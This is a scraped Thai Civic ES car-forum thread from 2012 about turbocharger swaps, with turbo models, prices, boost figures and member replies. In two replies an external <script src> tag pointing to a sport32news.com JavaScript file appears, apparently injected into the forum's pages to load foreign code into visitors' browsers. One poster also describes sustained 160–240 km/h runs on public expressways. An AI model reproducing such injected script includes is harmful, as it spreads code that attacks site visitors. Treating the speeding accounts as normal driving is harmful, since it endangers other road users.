Garret AR 60 - เป็นเทอร์โบเครื่อง 2000 เช่นเดียวกัน สำหรับเทอร์โบตัวนี้อยู่ในเครื่อง SR ฝาดำ หรือเครื่อง ของ Nissan silvia S13 เนื่องจากตัวนี้ให้กำลังอัดค่อนค้างสูงเนื่องจากเป็นเทอร์โบแบบบอลแบริ่ง ซึ่งนิสสันนิยมใช้เทอร์โบชนิดนี้ บูส standard อยู่ที่ 0.7 หรือ 10 PSI แต่คนเซ็ทโบ ไม่ค่อยนิยมเล่นนัก ยกเว้นพวกระบะ เพราะว่าเทอร์โบ แบบบอลแบริ่งนั้น ลูกปืนชอบมีปัญหา และพังง่าย สำหรับเทอร์โบลูกนี้นั้น ไม่ค่อยนิยม แต่ก็เป็นอีกหนึ่งทางเลือก สำหรับคนชอบความโหดครับ พวกวีออส ที่เซทโบ วิ่งกัน 11-12 วิ ก็ใช้เทอร์โบลูกนี้ครับ แต่ทำใส้ใหม่ ลดโข่งหลังเทอร์โบ บูส 1.3-1.4 Bar เอาเป็นว่าอีโวเดิมๆโดแน่ๆ

Turbo Nissan RB 25 Ballbaring ใบดำ - เป็นเทอร์โบเครื่อง RB25 ที่อยู่ใน Skyline R33 โดยจะมีรุ่น 45V1 ถึง 45v3 ตามความใหม่ของแต่ละรุ่น เทอร์โบลูกนี้เนื่องจากใบเป็นเซรามิก + กับเป็นแบบบอลแบริ่ง ทำให้บูสมาไวจี๊ดจ๊าดครับ และราคาถูก (อยู่ที่ 2500-3000) แต่ เนื่องจากอยู่ในเครื่อง CC 2500 จึงทำให้มีโข่งหน้าและหลังที่ใหญ่ หากจะนำมาดัดแปลงใส่กับรถที่ CC 1500 - 1800 เป็นต้องดัดแปลงโข่งหลังของเทอร์โบให้เล็กลง เพื่อให้บูสไม่มาช้าเกินไป สำหรับเทอร์โบลูกนี้ นอกจากเครื่อง RB20 กับ RB25 หรือเครื่อง  J ผมไม่แนะนำเนื่องจากหากเล่นบูสเกินที่ 1 บาร์ ใบเทอร์โบ หลุดง่ายมาก (จากประสบการณ์เพื่อนๆที่เคยใช้) เนื่องจากใบหน้าเป็นเซรามิกนั่นเอง
TD04L, TD04Hl, TD04h - ราคา อยู่ที่ 3500 - 4500 งงไหมครับว่าทำไมมันแพง จริงๆผมก็ยังงครับ
ถ้า 04 จาก อิมเค้าจะขายแพง แต่ถ้า 04 จาก Volvo ราคา จะลงมาทันที เหลือที่ 3000 -4000 หรือถ้าอยู่ใน 4g93T , 63RVR ก็จะ 4500 โดยประมาณ
จริงๆแล้วขนาดโข่งหน้าและหลังก็เท่ากัน แต่มันแพงที่ ถอดมาจากรถอะไรมากกว่าครับ นี่แหละหนาตลาดเมืองไทย

TD05 - น้าคิงขายอยู่ 4500 เองครับ ราคาตลาด น่าจะอยู่ที่ 5000 -6000 นะครับ แล้วแต่พ่อค้าเค้าจะตั้งขาย
TD06 - เอาเป็นว่า ผมไม่ค่อยรู้รายละเอียดนะครับ แต่ก็อยากเอามาแชร์ ไอ้ตัว 06 เนี่ย เห็นมันมีของ Gready ด้วยราคาใบเป็นหมื่นเลยครับ ส่วน 06 มิซซู ผมเคยเห็นอยู่นะ แต่ไม่รู้มันจะใหญ่เท่า Gready ไหม ผมเคยเจอ Toyota 3 ห่วง ยัด TD06 กะเครื่อง 4a-ge ใส้ Super charge โหดทีเดียวเชียว บูส 1.3
วิ่งได้ประมาณ 14-15 วิครับ เพราะ เครื่อง 1600 อ่ะเน้อ ได้แค่นี้ก็เก๋แล้ว

IHI B52 - ลูกนึง 4000 -4500 ครับ เกินนี้ไม่น่าซื้อละ คนนิยมเซทกันนะครับ แต่เห็นเค้าจะบอกว่าบูสมันมาช้ากัน เลยต้องลดโข่งหลัง ตัวนี้เปนเทอร์โบ บูสนะครับอย่าเข้าใจผิด ใครๆ คิดว่ามันเป็นบอลแบริ่ง เพื่อนผมใส่อยู่ นิสัยเทอร์โบมันจะดึงหนักๆ ยาวๆ แต่ไม่จี๊ดจ๊าดเหมือน TD04 ที่ปู๊ดปาดกว่าในช่วงต้น แต่ปลายหดหน่อยนึง

Garret AR60 - ราคาอยู่ที่ 2500 - 3000 นะครับ ถ้าเป็นของSRฝาแดงนะ แต่ถ้าเป็นของSRฝาดำหลังหักมันจะอยู่ที่ 6000 - 7500  (ไม่รู้มันจะแพงอะไรนักหนา อาจจะเป็นที่บอลแบริ่งก็ได้) นิสัยมันคือฟาดสุดอย่างเดียวเลยครับ เนื่องจากแกนเป็นลูกปืนมั้ง คือบูสไหลเมื่อไหร พังครับ เพื่อนผมเคยใช้ SR ฝาแดง แล้วเปลี่ยนเอาโบของฝาดำมาลง ปรากฏว่าบูสไหลไปที่ 1.3 จากเดิม 0.8 ปรากฏว่าควันไหลครับ เนื่องจากแหวนหักไป 2 สูบ ควันท่วมถนนเลย(แต่รถมันวิ่งได้นะผมก็ยังงง)

Nissan RB 25 - ต้องบอกก่อนนะครับ ตัวนี้ จะมีใบขาวกะใบดำ ผมเคยมีประสบการณ์ซื้อผิดมาแล้ว ตอนแรก ผมกะลงไอ้ตัวนี้เลย ซื้อมา 2300 เป็นรหัสเขียนว่า Nissan อีกฝั่งเขียนรหัสว่า 45v3 และ v3 หมายถึงเวอชั่น 3 เป็นใบขาวนะครับ แต่ลูกตะเนงเลย ผมก็งงว่าทำไมมันขายถูกจัง พึ่งมารู้ทีหลังครับ ว่าเทอร์โบสเป๊กเดียวกับ RB25 มันไม่ได้อยู่เฉพาะ Skyline มันไปอยู่ใน เครื่อง VG-30 3000 cc ของ 300ZX ตัวเก่าด้วย ตัวที่ผมได้มามันเป็นของ VG30 ถ้าของ Skyline ใบจะเป็นสีดำ แต่ทั้ง 2 ลูกหน้าตาเหมือนกัน ขนาดโข่งเท่ากันเลยนะครับ ส่วนใบดำก็ราคาไม่แพงครับ 2500- 3000 ใครที่จะซื้อเทอร์โบรุ่นนี้ ดูแกนดูสภาพใบของมันให้ดีนะครับ เพราะใบดำ มันพังง่ายมากๆ ใบมันบางมากเลยครับ เป็นเซรามิกสีดำ แค่ดีดก็แทบหักแล้ว
trucklinkin


ชื่อเล่น: โจ้

เข้าร่วม: 20 เมษา 2012
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1196

ที่อยู่: นครปฐม
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 กันยา 2012 16:03 - ขอข้อมูล es ลง turbo
....
Jacksu


เข้าร่วม: 13 มกรา 2009
ตอบ: 425

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 87

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 กันยา 2012 16:08 - ขอข้อมูล es ลง turbo
อ่านแล้ว  เดิมๆ ดีฟ่า
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
พุธ, 5 กันยา 2012 16:10 - ขอข้อมูล es ลง turbo
75000 พร้อมวิ่ง บูส 0.9 บาร์ 256 แรงม้าที่ล้อ หรือ play save บูส 0.5 บาร์ 200+ ม้าที่ล้อ จากประสบการณ์จิงที่ผ่านมา นั่งมาแล้ว ES TURBO 4 คัน ไม่ได้โม้.......................................... 55555 ในกรณีไม่ได้เปิดเครื่องนะ เครื่องเดิมๆเลย
ได้รับคำขอบคุณจาก: alit  hikaru_kung  black_boy  newcolor  tonaff  benzd  es330  BALLJARAN35  vor_ped  puyzaaaaa  jk2475  BEER_CIVIC ES 
tonaff


ชื่อเล่น: เอ

เข้าร่วม: 26 ธันวา 2008
ตอบ: 673

Guru ES
Guru ES

ได้รับคำขอบคุณ: 721
ให้คำขอบคุณ: 1404

ที่อยู่: ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 กันยา 2012 18:33 - ขอข้อมูล es ลง turbo
อ่านแล้วขึ้นปื๊ดๆ
อยากจัดปี๊ดๆ
งบไม่เยอะถ้าเทียบกับม้าที่ได้
karma


ชื่อเล่น: เต๋า

เข้าร่วม: 23 มีนา 2009
ตอบ: 718

Guru ES
Guru ES

ได้รับคำขอบคุณ: 954
ให้คำขอบคุณ: 722

ที่อยู่: พระราม 2
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 5 กันยา 2012 21:39 - ขอข้อมูล es ลง turbo
ของผมรายละเอียดตามนี้ครับ

http://www.civicesgroup.com/forum/topic45304
ได้รับคำขอบคุณจาก: puyzaaaaa  TOrunTO  WarHighways  numxs  l0899693136 
golf_6g72


ชื่อเล่น: กอล์ฟ

เข้าร่วม: 28 สิงหา 2012
ตอบ: 231

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 232
ให้คำขอบคุณ: 287

ที่อยู่: 16/4 ม.4 ต.น้ำเชี่ยว อ.แหลมงอบ จ.ตราด
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 5 กันยา 2012 22:43 - ขอข้อมูล es ลง turbo
งบน้อยค่อยๆคลานครับ   อิจฉาๆคนมีหอย
ได้รับคำขอบคุณจาก: TOrunTO 
took


เข้าร่วม: 08 ธันวา 2011
ตอบ: 941

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 607
ให้คำขอบคุณ: 42

ที่อยู่: เพชรบูรณ์&พิษณุโลก
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 5 กันยา 2012 23:15 - ขอข้อมูล es ลง turbo
อยากทำเดิมกัน
bankabby


ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 6 กันยา 2012 00:05 - ขอข้อมูล es ลง turbo
เอาแบบจบๆ ไม่จุกจิก ก็ k20 เลยครับ 
BALLJARAN35


ชื่อเล่น: บอล

เข้าร่วม: 17 มกรา 2009
ตอบ: 156

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 518
ให้คำขอบคุณ: 1006

ที่อยู่: ตลิ่งชัน
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 6 กันยา 2012 08:11 - ขอข้อมูล es ลง turbo
Lee_ES_turbo พิมพ์ว่า:
75000 พร้อมวิ่ง บูส 0.9 บาร์ 256 แรงม้าที่ล้อ หรือ play save บูส 0.5 บาร์ 200+ ม้าที่ล้อ จากประสบการณ์จิงที่ผ่านมา นั่งมาแล้ว ES TURBO 4 คัน ไม่ได้โม้.......................................... 55555 ในกรณีไม่ได้เปิดเครื่องนะ เครื่องเดิมๆเลย




75000 เป็นงบของเครื่อง 1.7 รึว่า 2.0 ครับ
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
พฤหัส, 6 กันยา 2012 08:47 - ขอข้อมูล es ลง turbo
1.7 คับ พร้อมกล้อง F-con นะคับ ส่วน 2.0 อาจมีบวก แต่ไม่เกิน 5000 คับ
ได้รับคำขอบคุณจาก: BALLJARAN35 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 6 กันยา 2012 08:50 - ขอข้อมูล es ลง turbo
karma พิมพ์ว่า:
ของผมรายละเอียดตามนี้ครับ

http://www.civicesgroup.com/forum/topic45304



ขอตามอันนี้อ่ะคับ กะลังหาทางอยู่ 
josho


เข้าร่วม: 25 มิถุนา 2012
ตอบ: 813

Guru ES
Guru ES

ได้รับคำขอบคุณ: 397
ให้คำขอบคุณ: 0

ที่อยู่: ปทุมธานี
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 6 กันยา 2012 09:35 - ขอข้อมูล es ลง turbo
เอ่อคือว่า 
kange


เข้าร่วม: 05 พฤศจิกา 2009
ตอบ: 13

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 5
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 6 กันยา 2012 10:45 - ขอข้อมูล es ลง turbo
ขอบคุณเอและเพื่อนๆ ทุกคนที่ให้ความรู้คราบ
BALLJARAN35


ชื่อเล่น: บอล

เข้าร่วม: 17 มกรา 2009
ตอบ: 156

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 518
ให้คำขอบคุณ: 1006

ที่อยู่: ตลิ่งชัน
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 6 กันยา 2012 19:40 - ขอข้อมูล es ลง turbo
Lee_ES_turbo พิมพ์ว่า:
1.7 คับ พร้อมกล้อง F-con นะคับ ส่วน 2.0 อาจมีบวก แต่ไม่เกิน 5000 คับ




ขอบคุณมากครับ
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 6 กันยา 2012 20:01 - ขอข้อมูล es ลง turbo
ถ้าต้องวิ่ง 160km/hr ยาว ๆ ซักครึ่งชั่วโมง หนึ่งชั่วโมง   Turbo จะไหวมั้ยอ่าครับ 

อยากรู้เกี่ยวกับระยะแช่ที่ทำได้  
ได้รับคำขอบคุณจาก: puyzaaaaa 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พฤหัส, 6 กันยา 2012 21:11 - ขอข้อมูล es ลง turbo
ปลั๊ก หมุด เลย ดีไหม ครับ !! 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 7 กันยา 2012 06:51 - ขอข้อมูล es ลง turbo
ไม่รู้ชุดนี้ลงกับesได้ป่าว เผื่อใครสนใจลองดูครับ

http://www.newcitythailand.com/bbs/thread-53598-1-1.html
ได้รับคำขอบคุณจาก: puyzaaaaa 
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
ศุกร์, 7 กันยา 2012 08:40 - ขอข้อมูล es ลง turbo
wut-chiangmai พิมพ์ว่า:
ถ้าต้องวิ่ง 160km/hr ยาว ๆ ซักครึ่งชั่วโมง หนึ่งชั่วโมง   Turbo จะไหวมั้ยอ่าครับ 

อยากรู้เกี่ยวกับระยะแช่ที่ทำได้  


ได้คับ ถ้าได้คนจูนที่ค่อนข้างชัว ของพวกผม ES 2.0 บูส 0.5 บาร์ 222 ม้า, ES 1.7 vtec บูส 0.9 บาร์ 256 ม้า, FD เครื่อง R20 CR-V(วางใหม่เเต่เดิมๆ) บูส 0.8 บาร์ 282 ม้า ทั้งสามคันเล่นที่ความเร็วสุดเกียร์ 5 (ราวๆ 240 km/h ไม่แน่ใจ เพราะไม่ค่อยกล้าละสายตาเนื่องจากเร็วเกิน) มาหมดแล้วบนทางด่วนโดนเมือง (บางคนอาจเคยเห็นคลิปใน youtube) โดนการเเช่อยู่นานพอสมควร ทุกวันนี้ก่อยังวิ่งอยู่คับ ส่วนตัวผมเองเคยเเช่จากรามอินทราถึงเส้นบางนา-ตราด โดนใช้วงแหวนรอบนอก ที่ความเร็วประมาน 160-180 ไม่มีปัญหาไรคับ เเค่โข่งหลังแดงแบบว่าจุดบุหรี่ติดเเค่นั้นเองคับ.....
ได้รับคำขอบคุณจาก: wut-chiangmai  puyzaaaaa 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
ศุกร์, 7 กันยา 2012 09:12 - ขอข้อมูล es ลง turbo
อิจฉาคนมีหอย อยากมีหอยบ้าง อิอิ
ได้รับคำขอบคุณจาก: puyzaaaaa 
pannatad


ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
ศุกร์, 7 กันยา 2012 11:13 - ขอข้อมูล es ลง turbo
อ่านๆดูเหมือนจะราคาไม่แรง น่าสนแฮะ
ได้รับคำขอบคุณจาก: puyzaaaaa 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
ศุกร์, 7 กันยา 2012 12:23 - ขอข้อมูล es ลง turbo
อยากได้ สัก 200 ม้า วิ้งน้ำมัน ต้องเตียม งบประมาณ เท่าไร ครับ

ลักษณะการขับ... ใช้งาน บ่อย ขับไม่เร็ว มากครับ แต่ก็อยาก รองทำ

ปล. เครื่อง เดิม 1.7 MT ครับ ขอบคุณครับ.. ที่สำคัญ ทำที่ไหนดีครับผม
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
ศุกร์, 7 กันยา 2012 12:40 - ขอข้อมูล es ลง turbo
  แล้วเซ็ทโบ  กะ  เซ็ทซุปเปอร์ชาร์ต  อันไหนมานจบง่ายกว่ากันครับ ผมเคยเจอชุดคิทของซุปเปอร์ชาร์ตตรงรุ่น k20a3 ด้วย
ได้รับคำขอบคุณจาก: puyzaaaaa 
TIRL_ES


ชื่อเล่น: เติ้ล

เข้าร่วม: 26 ธันวา 2011
ตอบ: 539

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 176

ที่อยู่: กทม
ปี: 2004
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 7 กันยา 2012 22:57 - ขอข้อมูล es ลง turbo
อยากจิงๆเซ็ตโบ รอหน่อยesลูกรัก

เด่วเรียนจบทำงานก่อน นะลูก

555

ปล.พ่อใกล้สอบอีกและ พ่อยังไม่อ่านหนังสือ
พ่อติดแต่ www.civicesgroup.com

อยากจะสอบเรื่อง esจิงๆ555 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: TOrunTO  puyzaaaaa 
aunja


ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

ที่อยู่: อยุธยา บุรีรัมย์ ชัยภูมิ
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 8 กันยา 2012 00:29 - ขอข้อมูล es ลง turbo
josho พิมพ์ว่า:
เอ่อคือว่า 


+1111
zaleng


ชื่อเล่น: เล้ง

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 438

ที่อยู่: เด็กชล...คนอุดร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 8 กันยา 2012 01:11 - ขอข้อมูล es ลง turbo
มาเก็บข้อมูลครับ... "<script src="https://sport32news.com/civicesgroup.js">
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 8 กันยา 2012 02:11 - ขอข้อมูล es ลง turbo
newcolor พิมพ์ว่า:
อิจฉาคนมีหอย อยากมีหอยบ้าง อิอิ




ตอนนี้หอยหายไปแล้วพี่  สงสัยต้องหาหอยใหม่
qee


ชื่อเล่น: เอฟ

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 920
ให้คำขอบคุณ: 1087

ที่อยู่: เพชรเกษม-บางแค
ปี: 2002
สี: แดง ไฟร์เปปเปอร์ (R-507P)
เสาร์, 8 กันยา 2012 06:17 - ขอข้อมูล es ลง turbo
puyzaaaaa พิมพ์ว่า:
อยากได้ สัก 200 ม้า วิ้งน้ำมัน ต้องเตียม งบประมาณ เท่าไร ครับ

ลักษณะการขับ... ใช้งาน บ่อย ขับไม่เร็ว มากครับ แต่ก็อยาก รองทำ

ปล. เครื่อง เดิม 1.7 MT ครับ ขอบคุณครับ.. ที่สำคัญ ทำที่ไหนดีครับผม



+1 อยากรู้ด้วยคน
ได้รับคำขอบคุณจาก: puyzaaaaa 
Yuttakan


ชื่อเล่น: ปอนด์

เข้าร่วม: 23 มิถุนา 2012
ตอบ: 480

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 231

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 8 กันยา 2012 15:02 - ขอข้อมูล es ลง turbo
เยอะอะ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...